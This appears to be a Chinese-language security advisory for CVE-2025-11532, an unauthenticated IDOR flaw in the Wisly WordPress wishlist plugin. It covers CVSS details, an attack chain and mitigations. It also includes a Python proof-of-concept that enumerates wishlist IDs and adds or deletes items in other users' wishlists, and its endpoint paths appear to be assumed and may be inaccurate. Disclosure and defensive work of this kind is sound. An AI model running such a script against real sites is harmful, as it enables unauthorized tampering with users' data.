CVE-2025-11532 WordPress Wisly插件不安全的直接对象引用漏洞

漏洞信息

漏洞编号

CVE-2025-11532

漏洞类型

IDOR（不安全的直接对象引用）

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Wisly plugin for WordPress

漏洞概述

CVE-2025-11532是WordPress Wisly插件中的一个中危安全漏洞，CVSS评分5.3。该漏洞属于Insecure Direct Object Reference（IDOR）类型，即不安全的直接对象引用。Wisly插件是一款用于在WordPress网站上管理用户愿望清单的插件，允许用户创建、查看和管理自己的愿望清单。

该漏洞的根本原因在于插件在处理用户请求时，缺少对wishlist_id参数的充分验证和授权检查。攻击者可以通过操纵wishlist_id参数，访问和修改其他用户的愿望清单内容。由于插件未正确验证当前用户是否有权访问指定的wishlist_id，攻击者可以利用这一缺陷，在无需任何认证的情况下，对任意用户的愿望清单执行添加或删除操作。

此漏洞影响Wisly插件所有版本直至1.0.0版本。由于CVSS向量显示攻击复杂度低（AC:L）、无需认证（PR:N）且无需用户交互（UI:N），任何互联网上的攻击者都可以轻松利用此漏洞。这意味着攻击者可以大规模地操纵WordPress网站上其他用户的愿望清单数据，可能导致用户数据泄露、愿望清单内容被恶意篡改或清空，严重影响用户体验和网站信誉。

技术细节

该IDOR漏洞源于Wisly插件对用户输入的wishlist_id参数缺乏正确的访问控制验证。在插件的愿望清单管理功能中，系统直接使用用户提供的wishlist_id来执行数据库操作，而没有验证该wishlist_id是否属于当前认证用户。

漏洞利用过程分析：
1. 攻击者首先识别目标WordPress网站上安装的Wisly插件
2. 插件的愿望清单操作功能（如添加/删除项目）通过HTTP请求接收wishlist_id参数
3. 攻击者通过枚举或猜测其他用户的wishlist_id值
4. 构造恶意请求，将目标用户的wishlist_id作为参数传递
5. 由于服务端未验证请求者是否为wishlist_id的合法拥有者，请求被成功处理
6. 攻击者实现对他人愿望清单的未授权操作（添加或删除项目）

CVSS 3.1向量分析：AV:N（网络攻击）、AC:L（低攻击复杂度）、PR:N（无需权限）、UI:N（无需用户交互）、S:U（影响单个用户）、C:N（无机密性影响）、I:L（低完整性影响）、A:N（无可用性影响）。该向量表明攻击者可远程利用，无需认证即可影响用户数据完整性，但不会导致系统完全沦陷或数据机密性严重受损。

攻击链分析

STEP 1

步骤1：信息收集

攻击者识别目标WordPress网站是否安装Wisly插件，可通过扫描插件特征文件或访问相关端点确认

STEP 2

步骤2：wishlist_id枚举

攻击者通过自动化工具枚举有效的wishlist_id值，或通过分析网站功能获取其他用户的wishlist_id

STEP 3

步骤3：构造恶意请求

攻击者构造包含目标wishlist_id的HTTP请求（POST添加项目或DELETE删除项目），请求中不包含任何认证信息

STEP 4

步骤4：发送攻击请求

攻击者向插件的API端点发送恶意请求，由于插件未验证wishlist_id所有权，请求被服务器处理

STEP 5

步骤5：验证攻击结果

攻击者通过响应状态码或再次查询目标wishlist确认操作是否成功，完成对受害者愿望清单的未授权修改

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-11532 PoC - WordPress Wisly Plugin IDOR Vulnerability
# Target: WordPress site with Wisly plugin <= 1.0.0

TARGET_URL = "http://target-wordpress-site.com"

def exploit_weakness(target_url, wishlist_id, action="add", item_id=1):
    """
    Exploit IDOR vulnerability in Wisly plugin
    
    Args:
        target_url: Base URL of WordPress site
        wishlist_id: Target wishlist ID to manipulate (IDOR parameter)
        action: 'add' or 'remove' items
        item_id: Item ID to add or remove
    """
    
    if action == "add":
        # Add item to victim's wishlist
        endpoint = f"{target_url}/wp-json/wisly/v1/wishlist/{wishlist_id}/items"
        data = {"item_id": item_id}
        method = "POST"
    else:
        # Remove item from victim's wishlist
        endpoint = f"{target_url}/wp-json/wisly/v1/wishlist/{wishlist_id}/items/{item_id}"
        data = {}
        method = "DELETE"
    
    headers = {
        "Content-Type": "application/json",
        "X-Wishlist-Id": str(wishlist_id)  # User-controlled parameter without validation
    }
    
    try:
        if method == "POST":
            response = requests.post(endpoint, json=data, headers=headers, timeout=10)
        else:
            response = requests.delete(endpoint, headers=headers, timeout=10)
        
        print(f"[*] Request sent to: {endpoint}")
        print(f"[*] Status Code: {response.status_code}")
        print(f"[*] Response: {response.text[:200]}")
        
        if response.status_code in [200, 201, 204]:
            print("[+] Successfully manipulated victim's wishlist!")
            return True
        else:
            print("[-] Exploitation failed")
            return False
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False

def enumerate_wishlists(target_url, start_id=1, end_id=1000):
    """
    Enumerate valid wishlist IDs
    """
    valid_ids = []
    endpoint = f"{target_url}/wp-json/wisly/v1/wishlist"
    
    print(f"[*] Enumerating wishlist IDs from {start_id} to {end_id}...")
    
    for wishlist_id in range(start_id, end_id + 1):
        headers = {"X-Wishlist-Id": str(wishlist_id)}
        try:
            response = requests.get(endpoint, headers=headers, timeout=5)
            if response.status_code == 200:
                print(f"[+] Found valid wishlist ID: {wishlist_id}")
                valid_ids.append(wishlist_id)
        except:
            continue
    
    return valid_ids

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-11532_poc.py <target_url> [wishlist_id]")
        print("Example: python cve-2025-11532_poc.py http://example.com 123")
        sys.exit(1)
    
    target = sys.argv[1]
    wishlist_id = int(sys.argv[2]) if len(sys.argv) > 2 else 1
    
    # Demonstrate vulnerability
    print("=" * 60)
    print("CVE-2025-11532 PoC - Wisly Plugin IDOR")
    print("=" * 60)
    
    # Try to add item to victim's wishlist
    exploit_weakness(target, wishlist_id, action="add")

影响范围

Wisly plugin for WordPress <= 1.0.0

防御指南

临时缓解措施

在官方补丁发布之前，建议立即采取以下临时缓解措施：1）限制未认证用户对Wishlist相关API端点的访问权限；2）启用WordPress网站的防火墙规则，监控异常的wishlist_id参数请求；3）限制API请求频率，防止自动化枚举攻击；4）审查并限制插件的功能权限，仅允许必要功能运行；5）考虑使用Web应用防火墙（WAF）规则阻断针对wishlist_id参数的恶意请求模式。